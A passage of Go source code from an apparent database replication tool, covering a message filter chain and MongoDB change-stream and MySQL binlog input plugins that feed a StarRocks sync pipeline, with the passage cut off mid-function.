		case ConvertSnakeCaseColumnFilterName:
			cscf := &ConvertSnakeCaseColumnFilter{}
			if err := cscf.NewFilter(fc.Config); err != nil {
				log.Fatal(err)
			}
			matcher = append(matcher, cscf)
		case RenameDmlColumnFilterName:
			rdcf := &RenameDmlColumnFilter{}
			if err := rdcf.NewFilter(fc.Config); err != nil {
				log.Fatal(err)
			}
			matcher = append(matcher, rdcf)
		case JsDmlColumnFilterName:
			jdcf := &JsDmlColumnFilter{}
			if err := jdcf.NewFilter(fc.Config); err != nil {
				log.Fatal(err)
			}
			matcher = append(matcher, jdcf)
		default:
			log.Warnf("filter: %s unhandled will not take effect.", typ)
		}
	}
	return matcher
}

// IterateFilter runs the chain in order; the first filter that returns true
// drops the message.
func (matcher MatcherFilter) IterateFilter(msg *msg.Msg) bool {
	for _, filter := range matcher {
		if filter.Filter(msg) {
			log.Debugf("filter msg %v", msg.DmlMsg.Data)
			return true
		}
	}
	return false
}

// StartFilter starts a goroutine that consumes syncChan, applies the chain,
// forwards surviving messages to outputChan, bumps the read counter for DML
// events, and (for the mongo input) lazily caches table meta per message.
// It exits when syncChan.Done is closed.
func (matcher MatcherFilter) StartFilter(syncChan *channel.SyncChannel, outputChan *channel.OutputChannel, inSchema core.Schema) {
	// consume syncChan
	go func() {
		for {
			select {
			case v := <-syncChan.SyncChan:
				switch data := v.(type) {
				case *msg.Msg:
					// apply the filter chain
					if !matcher.IterateFilter(data) {
						// forward to outputChan
						outputChan.SyncChan <- data

						if data.Type == msg.MsgDML {
							// prom read event number counter
							metrics.OpsReadProcessed.Inc()
							if data.PluginName == msg.MongoPlugin {
								// add table cache for mongo
								err := inSchema.AddTableForMsg(data)
								if err != nil {
									log.Fatalf("add table meta for msg missing: %v", data)
								}
							}
						}
					}
				}
			case <-syncChan.Done:
				log.Infof("close syncChan filter goroutine.")
				log.Infof("close input sync chan.")
				return
			}
		}
	}()
}
-------------------------------------------------------------------------------- /pkg/filter/utils.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | func FindColumn(data map[string]interface{}, name string) interface{} { 4 | if value, ok := data[name]; ok { 5 | return value 6 | } 7 | return nil 8 | } 9 | -------------------------------------------------------------------------------- /pkg/input/ip_mongo.go: -------------------------------------------------------------------------------- 1 | package input 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/juju/errors" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/position" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 15 | "github.com/mitchellh/mapstructure" 16 | "github.com/siddontang/go-log/log" 17 | "go.mongodb.org/mongo-driver/bson/primitive" 18 | "go.mongodb.org/mongo-driver/mongo" 19 | "go.mongodb.org/mongo-driver/mongo/options" 20 | "regexp" 21 | "sync" 22 | "sync/atomic" 23 | "time" 24 | ) 25 | 26 | type MongoInputPlugin struct { 27 | *config.MongoConfig 28 | Client *mongo.Client 29 | ChangeStream *mongo.ChangeStream 30 | syncChan *channel.SyncChannel 31 | position core.Position 32 | includeTableRegexLock sync.RWMutex 33 | includeTableRegex []*regexp.Regexp 34 | delay *uint32 35 | wg sync.WaitGroup 36 | ctx context.Context 37 | cancel context.CancelFunc 38 | } 39 | 40 | type mongoInputContext struct { 41 | Id *msg.WatchId `bson:"_id"` 42 | } 43 | 44 | type streamObject struct { 45 | Id *msg.WatchId `bson:"_id"` 46 | OperationType msg.ActionType 47 | FullDocument 
map[string]interface{} 48 | Ns NS 49 | UpdateDescription map[string]interface{} 50 | DocumentKey map[string]interface{} 51 | ClusterTime primitive.Timestamp 52 | } 53 | 54 | type NS struct { 55 | Database string `bson:"db"` 56 | Collection string `bson:"coll"` 57 | } 58 | 59 | const MongoName = "mongo" 60 | 61 | func init() { 62 | registry.RegisterPlugin(registry.InputPlugin, MongoName, &MongoInputPlugin{}) 63 | } 64 | 65 | func (mi *MongoInputPlugin) Configure(pipelineName string, configInput map[string]interface{}) error { 66 | mi.MongoConfig = &config.MongoConfig{} 67 | var source = configInput["source"] 68 | err := mapstructure.Decode(source, mi.MongoConfig) 69 | if err != nil { 70 | log.Fatal("input.source config parsing failed. err: %v", err.Error()) 71 | } 72 | return nil 73 | } 74 | 75 | func (mi *MongoInputPlugin) NewInput(inputConfig interface{}, ruleRegex []string, inSchema core.Schema) { 76 | mi.ctx, mi.cancel = context.WithCancel(context.Background()) 77 | 78 | uri := fmt.Sprintf("mongodb://%s:%s@%s", mi.UserName, mi.Password, mi.Uri) 79 | // client初始化 80 | client, err := mongo.Connect(context.TODO(), options.Client().ApplyURI(uri)) 81 | if err != nil { 82 | log.Fatal(err) 83 | } 84 | log.Infof("init mongo client") 85 | mi.Client = client 86 | mi.includeTableRegex = mi.checkTableRegex(ruleRegex) 87 | mi.delay = new(uint32) 88 | } 89 | 90 | func (mi *MongoInputPlugin) StartInput(pos core.Position, syncChan *channel.SyncChannel) core.Position { 91 | var mongoPos = &position.MongoPosition{} 92 | if err := mapstructure.Decode(pos, mongoPos); err != nil { 93 | log.Fatalf("mongo position parsing failed. 
err: %s", err.Error()) 94 | } 95 | 96 | opts := options.ChangeStream().SetFullDocument(options.UpdateLookup) 97 | if mongoPos.ResumeTokens.Data != "" { 98 | // 指定token启动change stream 99 | opts.SetResumeAfter(mongoPos.ResumeTokens) 100 | } else if !mongoPos.InitStartPosition.IsZero() { 101 | // 指定时间戳启动change stream 102 | t := &primitive.Timestamp{T: uint32(mongoPos.InitStartPosition.Unix()), I: 1} 103 | opts.SetStartAtOperationTime(t) 104 | } 105 | 106 | log.Infof("start change stream") 107 | 108 | changeStream, err := mi.Client.Watch(context.TODO(), mongo.Pipeline{}, opts) 109 | if err != nil { 110 | log.Fatal(err) 111 | } 112 | 113 | // assign value 114 | mi.syncChan = syncChan 115 | mi.ChangeStream = changeStream 116 | 117 | log.Infof("start change stream successfully") 118 | log.Infof("iterate over the cursor to handle the change-stream events") 119 | 120 | if mongoPos.ResumeTokens.Data == "" { 121 | log.Infof("iterate first cursor get init resumeToken value for save position") 122 | firstResumeToken := mi.getFirstResumeToken() 123 | if err := mongoPos.ModifyPosition(firstResumeToken); err != nil { 124 | log.Fatalf("first position save failed: %v", err.Error()) 125 | } 126 | } 127 | 128 | // iterate over the cursor to print the change-stream events 129 | go func() { 130 | for mi.ChangeStream.Next(context.TODO()) { 131 | mi.msgHandle() 132 | } 133 | }() 134 | 135 | if err := mi.ChangeStream.Err(); err != nil { 136 | if err := mi.ChangeStream.Close(context.TODO()); err != nil { 137 | log.Fatal(err) 138 | } 139 | log.Fatal(err) 140 | } 141 | 142 | mi.position = mongoPos 143 | 144 | // Start metrics 145 | mi.StartMetrics() 146 | 147 | return mongoPos 148 | } 149 | 150 | func (mi *MongoInputPlugin) StartMetrics() { 151 | mi.promTimingMetrics() 152 | } 153 | 154 | func (mi *MongoInputPlugin) Close() { 155 | if err := mi.ChangeStream.Close(context.TODO()); err != nil { 156 | log.Fatal(err) 157 | } 158 | log.Infof("close mongo change stream.") 159 | mi.cancel() 160 | 
mi.wg.Wait() 161 | log.Infof("close mongo input metrics.") 162 | } 163 | 164 | func (mi *MongoInputPlugin) SetIncludeTableRegex(config map[string]interface{}) (*regexp.Regexp, error) { 165 | mi.includeTableRegexLock.Lock() 166 | defer mi.includeTableRegexLock.Unlock() 167 | sourceSchema := fmt.Sprintf("%v", config["source-schema"]) 168 | sourceTable := fmt.Sprintf("%v", config["source-table"]) 169 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(sourceSchema, sourceTable)) 170 | if err != nil { 171 | return reg, err 172 | } 173 | // if exists, return 174 | for _, regex := range mi.includeTableRegex { 175 | if regex.String() == reg.String() { 176 | return reg, errors.New("table rule already exists.") 177 | } 178 | } 179 | mi.includeTableRegex = append(mi.includeTableRegex, reg) 180 | return reg, nil 181 | } 182 | 183 | func (mi *MongoInputPlugin) RemoveIncludeTableRegex(config map[string]interface{}) (*regexp.Regexp, error) { 184 | mi.includeTableRegexLock.Lock() 185 | defer mi.includeTableRegexLock.Unlock() 186 | sourceSchema := fmt.Sprintf("%v", config["source-schema"]) 187 | sourceTable := fmt.Sprintf("%v", config["source-table"]) 188 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(sourceSchema, sourceTable)) 189 | if err != nil { 190 | return reg, err 191 | } 192 | // if exists remove 193 | for i, regex := range mi.includeTableRegex { 194 | if regex.String() == reg.String() { 195 | mi.includeTableRegex = append(mi.includeTableRegex[:i], mi.includeTableRegex[i+1:]...) 
196 | return reg, nil 197 | } 198 | } 199 | return reg, errors.New("table rule not exists.") 200 | } 201 | 202 | func (mi *MongoInputPlugin) msgHandle() { 203 | var event = &streamObject{} 204 | if err := mi.ChangeStream.Decode(event); err != nil { 205 | log.Fatal(err) 206 | } 207 | 208 | mi.setDelay(event) 209 | 210 | // 默认过滤drop事件 211 | if event.OperationType == "drop" { 212 | mi.onRowCtl(event) 213 | return 214 | } 215 | 216 | // rule table match 217 | if mi.checkTableMatch(event) { 218 | mi.onRowCtl(event) 219 | return 220 | } 221 | 222 | mi.onRow(event) 223 | mi.onRowCtl(event) // for commit msg callback, modify position 224 | } 225 | 226 | func (mi *MongoInputPlugin) onRow(e *streamObject) { 227 | m := mi.eventPreProcessing(e) 228 | mi.syncChan.SyncChan <- m 229 | } 230 | 231 | func (mi *MongoInputPlugin) onRowCtl(e *streamObject) { 232 | ctlMsg := &msg.Msg{ 233 | Type: msg.MsgCtl, 234 | PluginName: msg.MongoPlugin, 235 | InputContext: &mongoInputContext{Id: e.Id}, 236 | AfterCommitCallback: mi.AfterMsgCommit, 237 | } 238 | mi.syncChan.SyncChan <- ctlMsg 239 | } 240 | 241 | func (mi *MongoInputPlugin) eventPreProcessing(e *streamObject) *msg.Msg { 242 | var dataMsg = &msg.Msg{ 243 | Database: e.Ns.Database, 244 | Table: e.Ns.Collection, 245 | Type: msg.MsgDML, 246 | DmlMsg: &msg.DMLMsg{}, 247 | ResumeToken: e.Id, 248 | Timestamp: time.Unix(int64(e.ClusterTime.T), int64(0)), 249 | PluginName: msg.MongoPlugin, 250 | } 251 | 252 | switch e.OperationType { 253 | case msg.InsertAction: 254 | dataMsg.DmlMsg.Action = msg.InsertAction 255 | dataMsg.DmlMsg.Data = e.FullDocument 256 | case msg.UpdateAction: 257 | dataMsg.DmlMsg.Action = msg.UpdateAction 258 | if e.FullDocument == nil { 259 | dataMsg.DmlMsg.Data = e.DocumentKey 260 | for key := range e.UpdateDescription { 261 | if key == "updatedFields" { 262 | updatedFields := e.UpdateDescription["updatedFields"].(map[string]interface{}) 263 | for updKey := range updatedFields { 264 | dataMsg.DmlMsg.Data[updKey] = 
updatedFields[updKey] 265 | } 266 | break 267 | } 268 | } 269 | } else { 270 | dataMsg.DmlMsg.Data = e.FullDocument 271 | } 272 | case msg.DeleteAction: 273 | dataMsg.DmlMsg.Action = msg.DeleteAction 274 | dataMsg.DmlMsg.Data = e.DocumentKey 275 | case msg.ReplaceAction: 276 | dataMsg.DmlMsg.Action = msg.ReplaceAction 277 | dataMsg.DmlMsg.Data = e.FullDocument 278 | default: 279 | log.Fatalf("unhandled message type: %s", e) 280 | } 281 | log.Debugf("msg event: %s %s.%s %v", e.OperationType, e.Ns.Database, e.Ns.Collection, dataMsg.DmlMsg.Data) 282 | return dataMsg 283 | } 284 | 285 | func (mi *MongoInputPlugin) AfterMsgCommit(msg *msg.Msg) error { 286 | ctx := msg.InputContext.(*mongoInputContext) 287 | if ctx.Id.Data != "" { 288 | if err := mi.position.ModifyPosition(ctx.Id.Data); err != nil { 289 | return errors.Trace(err) 290 | } 291 | } 292 | 293 | return nil 294 | } 295 | 296 | func (mi *MongoInputPlugin) promTimingMetrics() { 297 | mi.wg.Add(1) 298 | go func() { 299 | defer mi.wg.Done() 300 | ticker := time.NewTicker(time.Second * 3) 301 | defer ticker.Stop() 302 | 303 | for { 304 | select { 305 | case <-ticker.C: 306 | // prom sync delay set 307 | metrics.DelayReadTime.Set(float64(mi.GetDelay())) 308 | case <-mi.ctx.Done(): 309 | return 310 | } 311 | } 312 | }() 313 | } 314 | 315 | func (mi *MongoInputPlugin) setDelay(e *streamObject) { 316 | var newDelay uint32 317 | now := uint32(time.Now().Unix()) 318 | if now >= e.ClusterTime.T { 319 | newDelay = now - e.ClusterTime.T 320 | } 321 | atomic.StoreUint32(mi.delay, newDelay) 322 | } 323 | 324 | func (mi *MongoInputPlugin) GetDelay() uint32 { 325 | return atomic.LoadUint32(mi.delay) 326 | } 327 | 328 | func (mi *MongoInputPlugin) checkTableRegex(ruleRegex []string) []*regexp.Regexp { 329 | if n := len(ruleRegex); n > 0 { 330 | includeTableRegex := make([]*regexp.Regexp, n) 331 | for i, val := range ruleRegex { 332 | reg, err := regexp.Compile(val) 333 | if err != nil { 334 | log.Fatal(err) 335 | } 336 | 
includeTableRegex[i] = reg 337 | } 338 | return includeTableRegex 339 | } 340 | return nil 341 | } 342 | 343 | func (mi *MongoInputPlugin) checkTableMatch(e *streamObject) bool { 344 | matchFlag := true 345 | key := fmt.Sprintf("%s.%s", e.Ns.Database, e.Ns.Collection) 346 | // check include 347 | if mi.includeTableRegex != nil { 348 | for _, reg := range mi.includeTableRegex { 349 | if reg.MatchString(key) { 350 | matchFlag = false 351 | break 352 | } 353 | } 354 | } 355 | return matchFlag 356 | } 357 | 358 | func (mi *MongoInputPlugin) getFirstResumeToken() string { 359 | for mi.ChangeStream.Next(context.TODO()) { 360 | mi.msgHandle() 361 | return mi.ChangeStream.ResumeToken().Index(0).Value().StringValue() 362 | } 363 | return "" 364 | } 365 | -------------------------------------------------------------------------------- /pkg/input/ip_mysql.go: -------------------------------------------------------------------------------- 1 | package input 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/go-mysql-org/go-mysql/canal" 7 | "github.com/go-mysql-org/go-mysql/mysql" 8 | "github.com/go-mysql-org/go-mysql/replication" 9 | "github.com/juju/errors" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 15 | "github.com/fatalclarine/go-mysql-starrocks/pkg/position" 16 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 17 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 18 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 19 | "github.com/mitchellh/mapstructure" 20 | "github.com/pingcap/tidb/pkg/parser" 21 | "github.com/siddontang/go-log/log" 22 | "regexp" 23 | "sync" 24 | "time" 25 | ) 26 | 27 | type MysqlInputPlugin struct { 28 | canal.DummyEventHandler 29 | *config.MysqlConfig 30 | canalConfig 
*canal.Config 31 | syncChan *channel.SyncChannel 32 | canal *canal.Canal 33 | position core.Position 34 | inSchema core.Schema 35 | parser *parser.Parser 36 | syncPosition *position.MysqlBasePosition 37 | ctlMsgFlushPosition *position.MysqlBasePosition // only ddl before handle 38 | wg sync.WaitGroup 39 | ctx context.Context 40 | cancel context.CancelFunc 41 | } 42 | 43 | const MysqlName = "mysql" 44 | 45 | func init() { 46 | registry.RegisterPlugin(registry.InputPlugin, MysqlName, &MysqlInputPlugin{}) 47 | } 48 | 49 | func (mi *MysqlInputPlugin) Configure(pipelineName string, configInput map[string]interface{}) error { 50 | mi.MysqlConfig = &config.MysqlConfig{} 51 | var source = configInput["source"] 52 | err := mapstructure.Decode(source, mi.MysqlConfig) 53 | if err != nil { 54 | log.Fatal("input.source config parsing failed. err: %v", err.Error()) 55 | } 56 | return nil 57 | } 58 | 59 | func (mi *MysqlInputPlugin) NewInput(inputConfig interface{}, ruleRegex []string, inSchema core.Schema) { 60 | mi.ctx, mi.cancel = context.WithCancel(context.Background()) 61 | // 初始化canal配置 62 | cfg := canal.NewDefaultConfig() 63 | cfg.Addr = fmt.Sprintf("%s:%d", mi.MysqlConfig.Host, mi.MysqlConfig.Port) 64 | cfg.User = mi.MysqlConfig.UserName 65 | cfg.Password = mi.MysqlConfig.Password 66 | cfg.Dump.ExecutionPath = "" // ignore mysqldump, use binlog only 67 | cfg.IncludeTableRegex = ruleRegex 68 | // cfg.Logger = &log.Logger{} 69 | mi.canalConfig = cfg 70 | mi.inSchema = inSchema 71 | mi.parser = parser.New() 72 | mi.ctlMsgFlushPosition = &position.MysqlBasePosition{BinlogName: "", BinlogPos: 0, BinlogGTID: ""} 73 | } 74 | 75 | func (mi *MysqlInputPlugin) StartInput(pos core.Position, syncChan *channel.SyncChannel) core.Position { 76 | // 初始化canal 77 | c, err := canal.NewCanal(mi.canalConfig) 78 | if err != nil { 79 | log.Fatal(err) 80 | } 81 | mi.canal = c 82 | 83 | // Register a handler to handle RowsEvent 84 | c.SetEventHandler(mi) 85 | 86 | var mysqlPos = 
&position.MysqlPosition{} 87 | if err := mapstructure.Decode(pos, mysqlPos); err != nil { 88 | log.Fatalf("mysql position parsing failed. err: %s", err.Error()) 89 | } 90 | 91 | var gs mysql.GTIDSet 92 | if mysqlPos.BinlogGTID != "" { 93 | if gs, err = mysql.ParseGTIDSet("mysql", mysqlPos.BinlogGTID); err != nil { 94 | log.Fatal(err) 95 | } 96 | } else { 97 | log.Infof("load 'binlog-gtid' from db not exist") 98 | log.Infof("config file [input] param 'start-gtid' not exist") 99 | log.Infof("start get the current 'binlog-gtid' value") 100 | if gs, err = c.GetMasterGTIDSet(); err != nil { 101 | log.Fatal(err) 102 | } 103 | if gs.String() == "" { 104 | log.Fatal("the gtid value is empty, please confirm whether to enable gtid!") 105 | } 106 | mysqlPos.BinlogGTID = gs.String() 107 | if err := mysqlPos.SavePosition(); err != nil { 108 | log.Fatal(err) 109 | } 110 | } 111 | // assign value 112 | mi.syncChan = syncChan 113 | mi.position = mysqlPos 114 | mi.syncPosition = &position.MysqlBasePosition{BinlogName: mysqlPos.BinlogName, BinlogPos: mysqlPos.BinlogPos, BinlogGTID: mysqlPos.BinlogGTID} 115 | 116 | // init first ctl, bug fix start large transactions 117 | ctlMsg := &msg.Msg{ 118 | Type: msg.MsgCtl, 119 | PluginName: msg.MysqlPlugin, 120 | InputContext: &inputContext{ // last sync position 121 | BinlogName: mi.syncPosition.BinlogName, 122 | BinlogPos: mi.syncPosition.BinlogPos, 123 | BinlogGTID: mi.syncPosition.BinlogGTID, 124 | force: true}, 125 | AfterCommitCallback: mi.AfterMsgCommit, 126 | } 127 | mi.syncChan.SyncChan <- ctlMsg 128 | 129 | // Start canal 130 | go func() { 131 | err := c.StartFromGTID(gs) 132 | if err != nil { 133 | log.Fatal(err) 134 | } 135 | }() 136 | 137 | // Start metrics 138 | mi.StartMetrics() 139 | 140 | return mysqlPos 141 | } 142 | 143 | func (mi *MysqlInputPlugin) StartMetrics() { 144 | mi.promTimingMetrics() 145 | } 146 | 147 | func (mi *MysqlInputPlugin) Close() { 148 | mi.canal.Close() 149 | log.Infof("close mysql input canal.") 150 | 
mi.cancel() 151 | mi.wg.Wait() 152 | log.Infof("close mysql input metrics.") 153 | } 154 | 155 | func (mi *MysqlInputPlugin) SetIncludeTableRegex(config map[string]interface{}) (*regexp.Regexp, error) { 156 | sourceSchema := fmt.Sprintf("%v", config["source-schema"]) 157 | sourceTable := fmt.Sprintf("%v", config["source-table"]) 158 | cacheKey := fmt.Sprintf("%v.%v", sourceSchema, sourceTable) 159 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(sourceSchema, sourceTable)) 160 | if err != nil { 161 | return reg, err 162 | } 163 | 164 | _, err = mi.canal.AddIncludeTableRegex(cacheKey, reg) 165 | if err != nil { 166 | return reg, err 167 | } 168 | return reg, nil 169 | } 170 | 171 | func (mi *MysqlInputPlugin) RemoveIncludeTableRegex(config map[string]interface{}) (*regexp.Regexp, error) { 172 | sourceSchema := fmt.Sprintf("%v", config["source-schema"]) 173 | sourceTable := fmt.Sprintf("%v", config["source-table"]) 174 | cacheKey := fmt.Sprintf("%v.%v", sourceSchema, sourceTable) 175 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(sourceSchema, sourceTable)) 176 | if err != nil { 177 | return reg, err 178 | } 179 | 180 | _, err = mi.canal.DelIncludeTableRegex(cacheKey, reg) 181 | if err != nil { 182 | return reg, err 183 | } 184 | return reg, nil 185 | } 186 | 187 | func (mi *MysqlInputPlugin) OnRow(e *canal.RowsEvent) error { 188 | msgs := mi.eventPreProcessing(e) 189 | for _, m := range msgs { 190 | mi.syncChan.SyncChan <- m 191 | } 192 | return nil 193 | } 194 | 195 | func (mi *MysqlInputPlugin) OnTableChanged(schema string, table string) error { 196 | // onDDL before 197 | // send flush data msg 198 | // mi.syncChan.SyncChan <- ctlMsg 199 | ctlMsg := &msg.Msg{ 200 | Type: msg.MsgCtl, 201 | PluginName: msg.MysqlPlugin, 202 | InputContext: &inputContext{ // last sync position 203 | BinlogName: mi.syncPosition.BinlogName, 204 | BinlogPos: mi.syncPosition.BinlogPos, 205 | BinlogGTID: mi.syncPosition.BinlogGTID, 206 | force: true}, 207 | 
AfterCommitCallback: mi.AfterMsgCommit, 208 | } 209 | mi.syncChan.SyncChan <- ctlMsg 210 | 211 | // waiting flush data msgs... 212 | // if syncPosition gitd == ctlMsgFlushPosition gitd indicates that flush is complete 213 | for true { 214 | if mi.ctlMsgFlushPosition.BinlogGTID != "" { 215 | if mi.syncPosition.BinlogGTID == mi.ctlMsgFlushPosition.BinlogGTID { 216 | break 217 | } 218 | } 219 | time.Sleep(time.Second * 1) 220 | } 221 | return nil 222 | } 223 | 224 | func (mi *MysqlInputPlugin) OnPosSynced(pos mysql.Position, set mysql.GTIDSet, force bool) error { 225 | ctlMsg := &msg.Msg{ 226 | Type: msg.MsgCtl, 227 | PluginName: msg.MysqlPlugin, 228 | InputContext: &inputContext{BinlogName: pos.Name, BinlogPos: pos.Pos, BinlogGTID: set.String(), force: false}, 229 | AfterCommitCallback: mi.AfterMsgCommit, 230 | } 231 | mi.syncChan.SyncChan <- ctlMsg 232 | mi.syncPosition.BinlogName = pos.Name 233 | mi.syncPosition.BinlogPos = pos.Pos 234 | mi.syncPosition.BinlogGTID = set.String() 235 | return nil 236 | } 237 | 238 | func (mi *MysqlInputPlugin) OnDDL(nextPos mysql.Position, queryEvent *replication.QueryEvent) error { 239 | gtid := queryEvent.GSet.String() 240 | db := string(queryEvent.Schema) 241 | ddl := string(queryEvent.Query) 242 | ddlStmts, err := schema.DdlToDdlStatements(ddl, db) 243 | if err != nil { 244 | log.Fatalf("parse query(%s) err %v", queryEvent.Query, err) 245 | } 246 | log.Debugf("ddl event: %v", ddl) 247 | for nsIndex, ddlStmt := range ddlStmts { 248 | // filter meta db _go_mysql_sr 249 | if ddlStmt.Schema == position.DbName { 250 | continue 251 | } 252 | 253 | // schema table reg 254 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(ddlStmt.Schema, ddlStmt.Name)) 255 | if err != nil { 256 | log.Fatalf("parse schema table regexp err %v", err.Error()) 257 | } 258 | 259 | isHandleDDL := false 260 | for _, regex := range mi.canal.GetIncludeTableRegex() { 261 | if regex.String() == reg.String() { 262 | isHandleDDL = true 263 | break 264 | } 265 | 
266 | regexToSchema, regexToTable := rule.StrRegexToSchemaTable(regex.String()) 267 | // aliyun dms online ddl reg 268 | aliyunDMSOnlineDdlRegStr := fmt.Sprintf("^tp_\\d+_(ogt|del|ogl)_%s$", regexToTable) 269 | aliyunDMSOnlineDdlReg, err := regexp.Compile(aliyunDMSOnlineDdlRegStr) 270 | if err != nil { 271 | log.Fatalf("parse aliyun dms online ddl regexp err %v", err.Error()) 272 | } 273 | // aliyun dms online ddl reg2 274 | aliyunDMSOnlineDdlReg2Str := fmt.Sprintf("^tpa_[a-z0-9]+_%v$", regexToTable) 275 | aliyunDMSOnlineDdlReg2, err := regexp.Compile(aliyunDMSOnlineDdlReg2Str) 276 | if err != nil { 277 | log.Fatalf("parse aliyun dms online ddl regexp err %v", err.Error()) 278 | } 279 | // gh-ost online ddl reg 280 | ghostOnlineDdlRegStr := fmt.Sprintf("^_%s_(gho|ghc|del)$", regexToTable) 281 | ghostOnlineDdlReg, err := regexp.Compile(ghostOnlineDdlRegStr) 282 | if err != nil { 283 | log.Fatalf("parse gh-ost online ddl regexp err %v", err.Error()) 284 | } 285 | if ddlStmt.Schema == regexToSchema && 286 | (aliyunDMSOnlineDdlReg.MatchString(ddlStmt.Name) || 287 | aliyunDMSOnlineDdlReg2.MatchString(ddlStmt.Name) || 288 | ghostOnlineDdlReg.MatchString(ddlStmt.Name)) { 289 | isHandleDDL = true 290 | break 291 | } 292 | } 293 | 294 | if isHandleDDL { 295 | log.Infof("handle ddl event: %v", ddlStmt.RawSql) 296 | err = mi.inSchema.UpdateTable(ddlStmt.Schema, ddlStmt.Name, ddlStmt.RawSql, gtid, nsIndex) 297 | if err != nil { 298 | log.Errorf("handle query(%s) err %v", queryEvent.Query, err) 299 | } 300 | } else { 301 | log.Debugf("filter ddl event, ddl non-sync table, ddl: %v", ddl) 302 | } 303 | } 304 | return nil 305 | } 306 | 307 | func (mi *MysqlInputPlugin) eventPreProcessing(e *canal.RowsEvent) []*msg.Msg { 308 | var msgs []*msg.Msg 309 | if e.Action == canal.InsertAction { 310 | for _, row := range e.Rows { 311 | data := make(map[string]interface{}) 312 | 313 | if len(row) != len(e.Table.Columns) { 314 | columns := make([]string, 0, 16) 315 | for _, column := range 
e.Table.Columns { 316 | columns = append(columns, column.Name) 317 | } 318 | log.Warnf("insert %s.%s columns and data mismatch in length: %d vs %d, table %v", 319 | e.Table.Schema, e.Table.Name, len(e.Table.Columns), len(row), columns) 320 | log.Infof("load table:%s.%s meta columns from local", e.Table.Schema, e.Table.Name) 321 | ta, err := mi.inSchema.GetTable(e.Table.Schema, e.Table.Name) 322 | if err != nil { 323 | log.Fatalf("get tables failed, err: %v", err.Error()) 324 | } 325 | if len(row) != len(ta.Columns) { 326 | log.Warnf("insert %s.%s columns and data mismatch in local length: %d vs %d, table %v", 327 | e.Table.Schema, e.Table.Name, len(ta.Columns), len(row), ta.GetTableColumnsName()) 328 | } 329 | for j := 0; j < len(row); j++ { 330 | data[ta.Columns[j].Name] = deserializeForLocal(row[j], ta.Columns[j]) 331 | } 332 | } else { 333 | for j := 0; j < len(row); j++ { 334 | data[e.Table.Columns[j].Name] = deserialize(row[j], e.Table.Columns[j]) 335 | } 336 | } 337 | 338 | log.Debugf("msg event: %s %s.%s %v\n", e.Action, e.Table.Schema, e.Table.Name, data) 339 | msgs = append(msgs, &msg.Msg{ 340 | Table: e.Table.Name, 341 | Database: e.Table.Schema, 342 | Type: msg.MsgDML, 343 | DmlMsg: &msg.DMLMsg{Action: msg.InsertAction, Data: data}, 344 | Timestamp: time.Unix(int64(e.Header.Timestamp), 0), 345 | PluginName: msg.MysqlPlugin, 346 | }) 347 | 348 | } 349 | return msgs 350 | } 351 | if e.Action == canal.UpdateAction { 352 | for i, row := range e.Rows { 353 | if i%2 == 0 { 354 | continue 355 | } 356 | data := make(map[string]interface{}) 357 | old := make(map[string]interface{}) 358 | 359 | if len(row) != len(e.Table.Columns) { 360 | columns := make([]string, 0, 16) 361 | for _, column := range e.Table.Columns { 362 | columns = append(columns, column.Name) 363 | } 364 | log.Warnf("update %s.%s columns and data mismatch in length: %d vs %d, table %v", 365 | e.Table.Schema, e.Table.Name, len(e.Table.Columns), len(row), columns) 366 | log.Infof("load table:%s.%s 
meta columns from local", e.Table.Schema, e.Table.Name) 367 | ta, err := mi.inSchema.GetTable(e.Table.Schema, e.Table.Name) 368 | if err != nil { 369 | log.Fatalf("get tables failed, err: %v", err.Error()) 370 | } 371 | if len(row) != len(ta.Columns) { 372 | log.Warnf("update %s.%s columns and data mismatch in local length: %d vs %d, table %v", 373 | e.Table.Schema, e.Table.Name, len(ta.Columns), len(row), ta.GetTableColumnsName()) 374 | } 375 | for j := 0; j < len(row); j++ { 376 | data[ta.Columns[j].Name] = deserializeForLocal(row[j], ta.Columns[j]) 377 | old[ta.Columns[j].Name] = deserializeForLocal(e.Rows[i-1][j], ta.Columns[j]) 378 | } 379 | } else { 380 | for j := 0; j < len(row); j++ { 381 | data[e.Table.Columns[j].Name] = deserialize(row[j], e.Table.Columns[j]) 382 | old[e.Table.Columns[j].Name] = deserialize(e.Rows[i-1][j], e.Table.Columns[j]) 383 | } 384 | } 385 | 386 | log.Debugf("msg event: %s %s.%s %v\n", e.Action, e.Table.Schema, e.Table.Name, data) 387 | msgs = append(msgs, &msg.Msg{ 388 | Table: e.Table.Name, 389 | Database: e.Table.Schema, 390 | Type: msg.MsgDML, 391 | DmlMsg: &msg.DMLMsg{Action: msg.UpdateAction, Data: data}, 392 | Timestamp: time.Unix(int64(e.Header.Timestamp), 0), 393 | PluginName: msg.MysqlPlugin, 394 | }) 395 | } 396 | return msgs 397 | } 398 | if e.Action == canal.DeleteAction { 399 | for _, row := range e.Rows { 400 | data := make(map[string]interface{}) 401 | 402 | if len(row) != len(e.Table.Columns) { 403 | log.Warnf("delete %s.%s columns and data mismatch in length: %d vs %d", 404 | e.Table.Schema, e.Table.Name, len(e.Table.Columns), len(row)) 405 | log.Infof("load table:%s.%s meta columns from local", e.Table.Schema, e.Table.Name) 406 | ta, err := 